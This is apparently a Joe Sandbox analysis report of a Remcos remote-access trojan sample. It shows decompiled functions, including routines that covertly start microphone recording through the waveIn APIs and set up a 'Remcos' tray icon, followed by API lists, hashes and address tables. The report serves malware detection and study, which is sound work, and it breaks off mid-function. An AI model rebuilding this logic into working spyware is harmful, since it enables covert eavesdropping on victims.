                    				signed short _t3;
                    				signed int _t7;
                    				signed int _t15;
                    				signed int _t24;
                    				signed int _t25;
                    				void* _t33;
                    				intOrPtr* _t34;
                    				void* _t35;
                    
                    				_t35 = __eflags;
                    				CreateDirectoryW(E00401F04(0x473d4c), 0);
                    				_t3 = 8;
                    				 *0x471ab6 = _t3;
                    				 *0x471aac = 0x1f40;
                    				 *0x471ab0 = 0x1f40;
                    				0x471aa8->wFormatTag = 1;
                    				 *0x471aaa = 1;
                    				 *0x471ab4 = 1;
                    				 *0x471ab8 = 0;
                    				_t7 = E0043B4A1(_t5, E00401FAB(E00401E65(0x4740cc, 1, _t33, _t35, 0x24)));
                    				_t24 =  *0x471aac; // 0x0
                    				 *_t34 = 0x30008;
                    				_t25 = _t24 * _t7 * 0x3c;
                    				 *0x471abc = _t25;
                    				 *0x471ac4 = (( *0x471ab6 & 0x0000ffff) >> 3) * _t25;
                    				waveInOpen(0x471ac0, 0xffffffff, 0x471aa8, E00401D0B, 0, ??);
                    				E00401F9D( *0x471ac4);
                    				0x471a88->lpData = E00401FAB(0x473d64);
                    				_t15 =  *0x471ac4; // 0x0
                    				 *0x471a8c = _t15;
                    				 *0x471a90 = 0;
                    				 *0x471a94 = 0;
                    				 *0x471a98 = 0;
                    				 *0x471a9c = 0;
                    				waveInPrepareHeader( *0x471ac0, 0x471a88, 0x20);
                    				waveInAddBuffer( *0x471ac0, 0x471a88, 0x20);
                    				waveInStart( *0x471ac0);
                    				return 0;
                    			}











                    0x00401be9
                    0x00401bf9
                    0x00401c01
                    0x00401c07
                    0x00401c0f
                    0x00401c16
                    0x00401c1e
                    0x00401c2c
                    0x00401c33
                    0x00401c3a
                    0x00401c4d
                    0x00401c52
                    0x00401c5b
                    0x00401c6d
                    0x00401c84
                    0x00401c8a
                    0x00401c8f
                    0x00401ca2
                    0x00401cb5
                    0x00401cba
                    0x00401cc6
                    0x00401ccb
                    0x00401cd1
                    0x00401cd7
                    0x00401cdd
                    0x00401ce3
                    0x00401cf2
                    0x00401cfe
                    0x00401d08

                    APIs
                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                    • waveInOpen.WINMM(00471AC0,000000FF,00471AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                    • waveInPrepareHeader.WINMM(00471A88,00000020), ref: 00401CE3
                    • waveInAddBuffer.WINMM(00471A88,00000020), ref: 00401CF2
                    • waveInStart.WINMM ref: 00401CFE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                    • String ID: L=G$X2}$d=G
                    • API String ID: 1356121797-1459868478
                    • Opcode ID: b5117ea88f2bf32a9564fc55ee7d33a7b031a96c5054271b26f86d947141ca74
                    • Instruction ID: daaf66b07c184df99015d0d7e1a9e3ec5db13ab5ba6a2fc8a756972fa6a4d054
                    • Opcode Fuzzy Hash: b5117ea88f2bf32a9564fc55ee7d33a7b031a96c5054271b26f86d947141ca74
                    • Instruction Fuzzy Hash: 8F215971A162419BC724EF6EED0AAAA7BA5EB94755B00803FF10DD76B1DB3844808B0C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041CE7B(void* __eflags) {
                    				struct tagMSG _v32;
                    				char _v300;
                    				int _t14;
                    
                    				GetModuleFileNameA(0,  &_v300, 0x104);
                    				 *0x473b34 = E0041CF2D();
                    				0x473b30->cbSize = 0x1fc;
                    				 *0x473b38 = 1;
                    				 *0x473b40 = 0x401;
                    				 *0x473b44 = ExtractIconA(0,  &_v300, 0);
                    				lstrcpynA(0x473b48, "Remcos", 0x80);
                    				 *0x473b3c = 7;
                    				Shell_NotifyIconA(0, 0x473b30);
                    				while(1) {
                    					_t14 = GetMessageA( &_v32, 0, 0, 0);
                    					if(_t14 == 0) {
                    						break;
                    					}
                    					TranslateMessage( &_v32);
                    					DispatchMessageA( &_v32);
                    				}
                    				return _t14;
                    			}






                    0x0041ce94
                    0x0041ce9f
                    0x0041cead
                    0x0041ceb7
                    0x0041cec1
                    0x0041cee0
                    0x0041cee5
                    0x0041cef1
                    0x0041cefb
                    0x0041cf17
                    0x0041cf1e
                    0x0041cf26
                    0x00000000
                    0x00000000
                    0x0041cf07
                    0x0041cf11
                    0x0041cf11
                    0x0041cf2c

                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041CE94
                      • Part of subcall function 0041CF2D: RegisterClassExA.USER32(00000030), ref: 0041CF79
                      • Part of subcall function 0041CF2D: CreateWindowExA.USER32 ref: 0041CF94
                      • Part of subcall function 0041CF2D: GetLastError.KERNEL32 ref: 0041CF9E
                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041CECB
                    • lstrcpynA.KERNEL32(00473B48,Remcos,00000080), ref: 0041CEE5
                    • Shell_NotifyIconA.SHELL32(00000000,00473B30), ref: 0041CEFB
                    • TranslateMessage.USER32(?), ref: 0041CF07
                    • DispatchMessageA.USER32 ref: 0041CF11
                    • GetMessageA.USER32 ref: 0041CF1E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                    • String ID: Remcos
                    • API String ID: 1970332568-165870891
                    • Opcode ID: e1c970aadeb7ab0d987f1f9925d2db4a10c26f6366eb8cd9d711022e9703dfa1
                    • Instruction ID: 41b3825a6ccd8fe6ffa1ac359e46e160da11d287048f79ed5551b0a79ac76abd
                    • Opcode Fuzzy Hash: e1c970aadeb7ab0d987f1f9925d2db4a10c26f6366eb8cd9d711022e9703dfa1
                    • Instruction Fuzzy Hash: B80165B1440354ABC7109FA1EC4DEDBBB7CEB41B06F00402AF609D20A2DFB9A1859B5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E0044C78F(signed int _a4, void* _a8, unsigned int _a12) {
                    				signed int _v5;
                    				char _v6;
                    				void* _v12;
                    				unsigned int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				void* _v32;
                    				long _v36;
                    				void* _v40;
                    				long _v44;
                    				signed int* _t143;
                    				signed int _t145;
                    				intOrPtr _t149;
                    				signed int _t153;
                    				signed int _t155;
                    				signed char _t157;
                    				unsigned int _t158;
                    				intOrPtr _t162;
                    				void* _t163;
                    				signed int _t164;
                    				signed int _t167;
                    				long _t168;
                    				intOrPtr _t175;
                    				signed int _t176;
                    				intOrPtr _t178;
                    				signed int _t180;
                    				signed int _t184;
                    				char _t191;
                    				char* _t192;
                    				char _t199;
                    				char* _t200;
                    				signed char _t211;
                    				signed int _t213;
                    				long _t215;
                    				signed int _t216;
                    				char _t218;
                    				signed char _t222;
                    				signed int _t223;
                    				unsigned int _t224;
                    				intOrPtr _t225;
                    				unsigned int _t229;
                    				signed int _t231;
                    				signed int _t232;
                    				signed int _t233;
                    				signed int _t234;
                    				signed int _t235;
                    				signed char _t236;
                    				signed int _t237;
                    				signed int _t239;
                    				signed int _t240;
                    				signed int _t241;
                    				signed int _t242;
                    				signed int _t246;
                    				void* _t248;
                    				void* _t249;
                    
                    				_t213 = _a4;
                    				if(_t213 != 0xfffffffe) {
                    					__eflags = _t213;
                    					if(_t213 < 0) {
                    						L58:
                    						_t143 = E0043FFAA();
                    						 *_t143 =  *_t143 & 0x00000000;
                    						__eflags =  *_t143;
                    						 *((intOrPtr*)(E0043FFBD())) = 9;
                    						L59:
                    						_t145 = E0043B6B0();
                    						goto L60;
                    					}
                    					__eflags = _t213 -  *0x471a10; // 0x40
                    					if(__eflags >= 0) {
                    						goto L58;
                    					}
                    					_v24 = 1;
                    					_t239 = _t213 >> 6;
                    					_t235 = (_t213 & 0x0000003f) * 0x30;
                    					_v20 = _t239;
                    					_t149 =  *((intOrPtr*)(0x471810 + _t239 * 4));
                    					_v28 = _t235;
                    					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
                    					_v5 = _t222;
                    					__eflags = _t222 & 0x00000001;
                    					if((_t222 & 0x00000001) == 0) {
                    						goto L58;
                    					}
                    					_t223 = _a12;
                    					__eflags = _t223 - 0x7fffffff;
                    					if(_t223 <= 0x7fffffff) {
                    						__eflags = _t223;
                    						if(_t223 == 0) {
                    							L57:
                    							return 0;
                    						}
                    						__eflags = _v5 & 0x00000002;
                    						if((_v5 & 0x00000002) != 0) {
                    							goto L57;
                    						}
                    						__eflags = _a8;
                    						if(_a8 == 0) {
                    							goto L6;
                    						}
                    						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
                    						_v5 = _t153;
                    						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
                    						_t246 = 0;
                    						_t155 = _t153 - 1;
                    						__eflags = _t155;
                    						if(_t155 == 0) {
                    							_t236 = _v24;
                    							_t157 =  !_t223;
                    							__eflags = _t236 & _t157;
                    							if((_t236 & _t157) != 0) {
                    								_t158 = 4;
                    								_t224 = _t223 >> 1;
                    								_v16 = _t158;
                    								__eflags = _t224 - _t158;
                    								if(_t224 >= _t158) {
                    									_t158 = _t224;
                    									_v16 = _t224;
                    								}
                    								_t246 = E00445B29(_t224, _t158);
                    								E00446172(0);
                    								E00446172(0);
                    								_t249 = _t248 + 0xc;
                    								_v12 = _t246;
                    								__eflags = _t246;
                    								if(_t246 != 0) {
                    									_t162 = E0044BCFB(_t213, 0, 0, _v24);
                    									_t225 =  *((intOrPtr*)(0x471810 + _t239 * 4));
                    									_t248 = _t249 + 0x10;
                    									_t240 = _v28;
                    									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
                    									_t163 = _t246;
                    									 *(_t240 + _t225 + 0x24) = _t236;
                    									_t235 = _t240;
                    									_t223 = _v16;
                    									L21:
                    									_t241 = 0;
                    									_v40 = _t163;
                    									_t215 =  *((intOrPtr*)(0x471810 + _v20 * 4));
                    									_v36 = _t215;
                    									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
                    									_t216 = _a4;
                    									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
                    										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
                    										_v6 = _t218;
                    										__eflags = _t218 - 0xa;
                    										_t216 = _a4;
                    										if(_t218 != 0xa) {
                    											__eflags = _t223;
                    											if(_t223 != 0) {
                    												_t241 = _v24;
                    												 *_t163 = _v6;
                    												_t216 = _a4;
                    												_t232 = _t223 - 1;
                    												__eflags = _v5;
                    												_v12 = _t163 + 1;
                    												_v16 = _t232;
                    												 *((char*)(_t235 +  *((intOrPtr*)(0x471810 + _v20 * 4)) + 0x2a)) = 0xa;
                    												if(_v5 != 0) {
                    													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x471810 + _v20 * 4)) + 0x2b));
                    													_v6 = _t191;
                    													__eflags = _t191 - 0xa;
                    													if(_t191 != 0xa) {
                    														__eflags = _t232;
                    														if(_t232 != 0) {
                    															_t192 = _v12;
                    															_t241 = 2;
                    															 *_t192 = _v6;
                    															_t216 = _a4;
                    															_t233 = _t232 - 1;
                    															_v12 = _t192 + 1;
                    															_v16 = _t233;
                    															 *((char*)(_t235 +  *((intOrPtr*)(0x471810 + _v20 * 4)) + 0x2b)) = 0xa;
                    															__eflags = _v5 - _v24;
                    															if(_v5 == _v24) {
                    																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x471810 + _v20 * 4)) + 0x2c));
                    																_v6 = _t199;
                    																__eflags = _t199 - 0xa;
                    																if(_t199 != 0xa) {
                    																	__eflags = _t233;
                    																	if(_t233 != 0) {
                    																		_t200 = _v12;
                    																		_t241 = 3;
                    																		 *_t200 = _v6;
                    																		_t216 = _a4;
                    																		_t234 = _t233 - 1;
                    																		__eflags = _t234;
                    																		_v12 = _t200 + 1;
                    																		_v16 = _t234;
                    																		 *((char*)(_t235 +  *((intOrPtr*)(0x471810 + _v20 * 4)) + 0x2c)) = 0xa;
                    																	}
                    																}
                    															}
                    														}
                    													}
                    												}
                    											}
                    										}
                    									}
                    									_t164 = E00454F05(_t216);
                    									__eflags = _t164;
                    									if(_t164 == 0) {
                    										L41:
                    										_v24 = 0;
                    										L42:
                    										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
                    										__eflags = _t167;
                    										if(_t167 == 0) {
                    											L53:
                    											_t168 = GetLastError();
                    											_t241 = 5;
                    											__eflags = _t168 - _t241;
                    											if(_t168 != _t241) {
                    												__eflags = _t168 - 0x6d;
                    												if(_t168 != 0x6d) {
                    													L37:
                    													E0043FF87(_t168);
                    													goto L38;
                    												}
                    												_t242 = 0;
                    												goto L39;
                    											}
                    											 *((intOrPtr*)(E0043FFBD())) = 9;
                    											 *(E0043FFAA()) = _t241;
                    											goto L38;
                    										}
                    										_t229 = _a12;
                    										__eflags = _v36 - _t229;
                    										if(_v36 > _t229) {
                    											goto L53;
                    										}
                    										_t242 = _t241 + _v36;
                    										__eflags = _t242;
                    										L45:
                    										_t237 = _v28;
                    										_t175 =  *((intOrPtr*)(0x471810 + _v20 * 4));
                    										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
                    										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
                    											__eflags = _v5 - 2;
                    											if(_v5 == 2) {
                    												__eflags = _v24;
                    												_push(_t242 >> 1);
                    												_push(_v40);
                    												_push(_t216);
                    												if(_v24 == 0) {
                    													_t176 = E0044C2EB();
                    												} else {
                    													_t176 = E0044C5FB();
                    												}
                    											} else {
                    												_t230 = _t229 >> 1;
                    												__eflags = _t229 >> 1;
                    												_t176 = E0044C4AB(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
                    											}
                    											_t242 = _t176;
                    										}
                    										goto L39;
                    									}
                    									_t231 = _v28;
                    									_t178 =  *((intOrPtr*)(0x471810 + _v20 * 4));
                    									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
                    									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
                    										goto L41;
                    									}
                    									_t180 = GetConsoleMode(_v32,  &_v44);
                    									__eflags = _t180;
                    									if(_t180 == 0) {
                    										goto L41;
                    									}
                    									__eflags = _v5 - 2;
                    									if(_v5 != 2) {
                    										goto L42;
                    									}
                    									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
                    									__eflags = _t184;
                    									if(_t184 != 0) {
                    										_t229 = _a12;
                    										_t242 = _t241 + _v36 * 2;
                    										goto L45;
                    									}
                    									_t168 = GetLastError();
                    									goto L37;
                    								} else {
                    									 *((intOrPtr*)(E0043FFBD())) = 0xc;
                    									 *(E0043FFAA()) = 8;
                    									L38:
                    									_t242 = _t241 | 0xffffffff;
                    									__eflags = _t242;
                    									L39:
                    									E00446172(_t246);
                    									return _t242;
                    								}
                    							}
                    							L15:
                    							 *(E0043FFAA()) =  *_t206 & _t246;
                    							 *((intOrPtr*)(E0043FFBD())) = 0x16;
                    							E0043B6B0();
                    							goto L38;
                    						}
                    						__eflags = _t155 != 1;
                    						if(_t155 != 1) {
                    							L13:
                    							_t163 = _a8;
                    							_v16 = _t223;
                    							_v12 = _t163;
                    							goto L21;
                    						}
                    						_t211 =  !_t223;
                    						__eflags = _t211 & 0x00000001;
                    						if((_t211 & 0x00000001) == 0) {
                    							goto L15;
                    						}
                    						goto L13;
                    					}
                    					L6:
                    					 *(E0043FFAA()) =  *_t151 & 0x00000000;
                    					 *((intOrPtr*)(E0043FFBD())) = 0x16;
                    					goto L59;
                    				} else {
                    					 *(E0043FFAA()) =  *_t212 & 0x00000000;
                    					_t145 = E0043FFBD();
                    					 *_t145 = 9;
                    					L60:
                    					return _t145 | 0xffffffff;
                    				}
                    			}



























































                    0x0044c798
                    0x0044c79f
                    0x0044c7b9
                    0x0044c7bb
                    0x0044cb23
                    0x0044cb23
                    0x0044cb28
                    0x0044cb28
                    0x0044cb30
                    0x0044cb36
                    0x0044cb36
                    0x00000000
                    0x0044cb36
                    0x0044c7c1
                    0x0044c7c7
                    0x00000000
                    0x00000000
                    0x0044c7cf
                    0x0044c7db
                    0x0044c7de
                    0x0044c7e1
                    0x0044c7e4
                    0x0044c7eb
                    0x0044c7ee
                    0x0044c7f2
                    0x0044c7f5
                    0x0044c7f8
                    0x00000000
                    0x00000000
                    0x0044c7fe
                    0x0044c801
                    0x0044c807
                    0x0044c821
                    0x0044c823
                    0x0044cb1f
                    0x00000000
                    0x0044cb1f
                    0x0044c829
                    0x0044c82d
                    0x00000000
                    0x00000000
                    0x0044c833
                    0x0044c837
                    0x00000000
                    0x00000000
                    0x0044c83e
                    0x0044c842
                    0x0044c845
                    0x0044c848
                    0x0044c84d
                    0x0044c84d
                    0x0044c850
                    0x0044c86d
                    0x0044c872
                    0x0044c874
                    0x0044c876
                    0x0044c896
                    0x0044c897
                    0x0044c899
                    0x0044c89c
                    0x0044c89e
                    0x0044c8a0
                    0x0044c8a2
                    0x0044c8a2
                    0x0044c8ad
                    0x0044c8af
                    0x0044c8b6
                    0x0044c8bb
                    0x0044c8be
                    0x0044c8c1
                    0x0044c8c3
                    0x0044c8e8
                    0x0044c8ed
                    0x0044c8f4
                    0x0044c8f7
                    0x0044c8fa
                    0x0044c8fe
                    0x0044c900
                    0x0044c904
                    0x0044c906
                    0x0044c909
                    0x0044c90c
                    0x0044c90e
                    0x0044c911
                    0x0044c918
                    0x0044c91b
                    0x0044c920
                    0x0044c923
                    0x0044c92c
                    0x0044c930
                    0x0044c933
                    0x0044c936
                    0x0044c939
                    0x0044c93f
                    0x0044c941
                    0x0044c94a
                    0x0044c94d
                    0x0044c950
                    0x0044c953
                    0x0044c954
                    0x0044c958
                    0x0044c95e
                    0x0044c968
                    0x0044c96d
                    0x0044c97d
                    0x0044c981
                    0x0044c984
                    0x0044c986
                    0x0044c988
                    0x0044c98a
                    0x0044c98c
                    0x0044c994
                    0x0044c995
                    0x0044c998
                    0x0044c99b
                    0x0044c99c
                    0x0044c9a2
                    0x0044c9ac
                    0x0044c9b4
                    0x0044c9b7
                    0x0044c9c3
                    0x0044c9c7
                    0x0044c9ca
                    0x0044c9cc
                    0x0044c9ce
                    0x0044c9d0
                    0x0044c9d2
                    0x0044c9da
                    0x0044c9db
                    0x0044c9de
                    0x0044c9e1
                    0x0044c9e1
                    0x0044c9e2
                    0x0044c9e8
                    0x0044c9f2
                    0x0044c9f2
                    0x0044c9d0
                    0x0044c9cc
                    0x0044c9b7
                    0x0044c98a
                    0x0044c986
                    0x0044c96d
                    0x0044c941
                    0x0044c939
                    0x0044c9f8
                    0x0044c9fe
                    0x0044ca00
                    0x0044ca73
                    0x0044ca73
                    0x0044ca77
                    0x0044ca87
                    0x0044ca8d
                    0x0044ca8f
                    0x0044caeb
                    0x0044caeb
                    0x0044caf3
                    0x0044caf4
                    0x0044caf6
                    0x0044cb0f
                    0x0044cb12
                    0x0044ca4f
                    0x0044ca50
                    0x00000000
                    0x0044ca55
                    0x0044cb18
                    0x00000000
                    0x0044cb18
                    0x0044cafd
                    0x0044cb08
                    0x00000000
                    0x0044cb08
                    0x0044ca91
                    0x0044ca94
                    0x0044ca97
                    0x00000000
                    0x00000000
                    0x0044ca99
                    0x0044ca99
                    0x0044ca9c
                    0x0044ca9f
                    0x0044caa2
                    0x0044caa9
                    0x0044caae
                    0x0044cab0
                    0x0044cab4
                    0x0044cacf
                    0x0044cad3
                    0x0044cad4
                    0x0044cad7
                    0x0044cad8
                    0x0044cae4
                    0x0044cada
                    0x0044cada
                    0x0044cada
                    0x0044cab6
                    0x0044cab6
                    0x0044cab6
                    0x0044cac1
                    0x0044cac6
                    0x0044cac9
                    0x0044cac9
                    0x00000000
                    0x0044caae
                    0x0044ca05
                    0x0044ca08
                    0x0044ca0f
                    0x0044ca14
                    0x00000000
                    0x00000000
                    0x0044ca1d
                    0x0044ca23
                    0x0044ca25
                    0x00000000
                    0x00000000
                    0x0044ca27
                    0x0044ca2b
                    0x00000000
                    0x00000000
                    0x0044ca3f
                    0x0044ca45
                    0x0044ca47
                    0x0044ca6b
                    0x0044ca6e
                    0x00000000
                    0x0044ca6e
                    0x0044ca49
                    0x00000000
                    0x0044c8c5
                    0x0044c8ca
                    0x0044c8d5
                    0x0044ca56
                    0x0044ca56
                    0x0044ca56
                    0x0044ca59
                    0x0044ca5a
                    0x00000000
                    0x0044ca62
                    0x0044c8c3
                    0x0044c878
                    0x0044c87d
                    0x0044c884
                    0x0044c88a
                    0x00000000
                    0x0044c88a
                    0x0044c852
                    0x0044c855
                    0x0044c85f
                    0x0044c85f
                    0x0044c862
                    0x0044c865
                    0x00000000
                    0x0044c865
                    0x0044c859
                    0x0044c85b
                    0x0044c85d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044c85d
                    0x0044c809
                    0x0044c80e
                    0x0044c816
                    0x00000000
                    0x0044c7a1
                    0x0044c7a6
                    0x0044c7a9
                    0x0044c7ae
                    0x0044cb3b
                    0x00000000
                    0x0044cb3b

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 46bebdcc314c2c930a65844cf0a11325a76525d462b5c5ec19f7500448f273d3
                    • Instruction ID: a993214f952e54e566325116191ad3d497a6a58f4f84608f4dddc8c648075ebf
                    • Opcode Fuzzy Hash: 46bebdcc314c2c930a65844cf0a11325a76525d462b5c5ec19f7500448f273d3
                    • Instruction Fuzzy Hash: 52C1F871D05289AFEF51DFA9D881BAEBBB0BF0A310F1C415AE414A7352C7389D41CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E00444B6B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                    				signed int _v8;
                    				short _v270;
                    				short _v272;
                    				char _v528;
                    				char _v700;
                    				signed int _v704;
                    				signed int _v708;
                    				short _v710;
                    				signed int* _v712;
                    				signed int _v716;
                    				signed int _v720;
                    				signed int _v724;
                    				signed int* _v728;
                    				signed int _v732;
                    				signed int _v736;
                    				signed int _v740;
                    				signed int _v744;
                    				signed int _t149;
                    				void* _t156;
                    				signed int _t157;
                    				signed int _t158;
                    				intOrPtr _t159;
                    				signed int _t162;
                    				signed int _t166;
                    				signed int _t167;
                    				intOrPtr _t169;
                    				signed int _t172;
                    				signed int _t173;
                    				signed int _t175;
                    				signed int _t195;
                    				signed int _t196;
                    				signed int _t199;
                    				signed int _t204;
                    				signed int _t207;
                    				intOrPtr* _t213;
                    				intOrPtr* _t214;
                    				signed int _t225;
                    				signed int _t228;
                    				intOrPtr* _t229;
                    				signed int _t231;
                    				signed int* _t235;
                    				void* _t243;
                    				signed int _t244;
                    				intOrPtr _t246;
                    				signed int _t251;
                    				signed int _t253;
                    				signed int _t257;
                    				signed int* _t258;
                    				intOrPtr* _t259;
                    				short _t260;
                    				signed int _t262;
                    				signed int _t264;
                    				void* _t266;
                    				void* _t268;
                    
                    				_t262 = _t264;
                    				_t149 =  *0x47000c; // 0xc3a97826
                    				_v8 = _t149 ^ _t262;
                    				_push(__ebx);
                    				_t207 = _a8;
                    				_push(__esi);
                    				_push(__edi);
                    				_t246 = _a4;
                    				_v744 = _t207;
                    				_v728 = E00447C05(_t207, __ecx, __edx) + 0x278;
                    				_push( &_v708);
                    				_t156 = E004442B5(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
                    				_t266 = _t264 - 0x2e4 + 0x18;
                    				if(_t156 != 0) {
                    					_t11 = _t207 + 2; // 0x6
                    					_t251 = _t11 << 4;
                    					__eflags = _t251;
                    					_t157 =  &_v272;
                    					_v716 = _t251;
                    					_t213 =  *((intOrPtr*)(_t251 + _t246));
                    					while(1) {
                    						_v704 = _v704 & 0x00000000;
                    						__eflags =  *_t157 -  *_t213;
                    						_t253 = _v716;
                    						if( *_t157 !=  *_t213) {
                    							break;
                    						}
                    						__eflags =  *_t157;
                    						if( *_t157 == 0) {
                    							L8:
                    							_t158 = _v704;
                    						} else {
                    							_t260 =  *((intOrPtr*)(_t157 + 2));
                    							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
                    							_v710 = _t260;
                    							_t253 = _v716;
                    							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
                    								break;
                    							} else {
                    								_t157 = _t157 + 4;
                    								_t213 = _t213 + 4;
                    								__eflags = _v710;
                    								if(_v710 != 0) {
                    									continue;
                    								} else {
                    									goto L8;
                    								}
                    							}
                    						}
                    						L10:
                    						__eflags = _t158;
                    						if(_t158 != 0) {
                    							_t214 =  &_v272;
                    							_t243 = _t214 + 2;
                    							do {
                    								_t159 =  *_t214;
                    								_t214 = _t214 + 2;
                    								__eflags = _t159 - _v704;
                    							} while (_t159 != _v704);
                    							_v720 = (_t214 - _t243 >> 1) + 1;
                    							_t162 = E00445B29(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
                    							_v732 = _t162;
                    							__eflags = _t162;
                    							if(_t162 == 0) {
                    								goto L1;
                    							} else {
                    								_v724 =  *((intOrPtr*)(_t253 + _t246));
                    								_t35 = _t207 * 4; // 0xcf42
                    								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
                    								_t38 = _t246 + 8; // 0x8b56ff8b
                    								_v740 =  *_t38;
                    								_t223 =  &_v272;
                    								_v712 = _t162 + 4;
                    								_t166 = E00447551(_t162 + 4, _v720,  &_v272);
                    								_t268 = _t266 + 0xc;
                    								__eflags = _t166;
                    								if(_t166 != 0) {
                    									_t167 = _v704;
                    									_push(_t167);
                    									_push(_t167);
                    									_push(_t167);
                    									_push(_t167);
                    									_push(_t167);
                    									E0043B6DD();
                    									asm("int3");
                    									_t169 =  *0x471518; // 0x0
                    									return _t169;
                    								} else {
                    									__eflags = _v272 - 0x43;
                    									 *((intOrPtr*)(_t253 + _t246)) = _v712;
                    									if(_v272 != 0x43) {
                    										L19:
                    										_t172 = E00443FC2(_t207, _t223, _t246,  &_v700);
                    										_t225 = _v704;
                    										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
                    									} else {
                    										__eflags = _v270;
                    										if(_v270 != 0) {
                    											goto L19;
                    										} else {
                    											_t225 = _v704;
                    											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
                    										}
                    									}
                    									__eflags = _t207 - 2;
                    									if(_t207 != 2) {
                    										__eflags = _t207 - 1;
                    										if(_t207 != 1) {
                    											__eflags = _t207 - 5;
                    											if(_t207 == 5) {
                    												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
                    											}
                    										} else {
                    											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
                    										}
                    									} else {
                    										_t258 = _v728;
                    										_t244 = _t225;
                    										_t235 = _t258;
                    										 *(_t246 + 8) = _v708;
                    										_v712 = _t258;
                    										_v720 = _t258[8];
                    										_v708 = _t258[9];
                    										while(1) {
                    											_t64 = _t246 + 8; // 0x8b56ff8b
                    											__eflags =  *_t64 -  *_t235;
                    											if( *_t64 ==  *_t235) {
                    												break;
                    											}
                    											_t259 = _v712;
                    											_t244 = _t244 + 1;
                    											_t204 =  *_t235;
                    											 *_t259 = _v720;
                    											_v708 = _t235[1];
                    											_t235 = _t259 + 8;
                    											 *((intOrPtr*)(_t259 + 4)) = _v708;
                    											_t207 = _v744;
                    											_t258 = _v728;
                    											_v720 = _t204;
                    											_v712 = _t235;
                    											__eflags = _t244 - 5;
                    											if(_t244 < 5) {
                    												continue;
                    											} else {
                    											}
                    											L27:
                    											__eflags = _t244 - 5;
                    											if(__eflags == 0) {
                    												_t88 = _t246 + 8; // 0x8b56ff8b
                    												_t195 = E00450B3C(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x45c508, 0x7f,  &_v528,  *_t88, 1);
                    												_t268 = _t268 + 0x1c;
                    												__eflags = _t195;
                    												_t196 = _v704;
                    												if(_t195 == 0) {
                    													_t258[1] = _t196;
                    												} else {
                    													do {
                    														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
                    														_t196 = _t196 + 1;
                    														__eflags = _t196 - 0x7f;
                    													} while (_t196 < 0x7f);
                    													_t199 = E004369FA( &_v528,  *0x470170, 0xfe);
                    													_t268 = _t268 + 0xc;
                    													__eflags = _t199;
                    													_t258[1] = 0 | _t199 == 0x00000000;
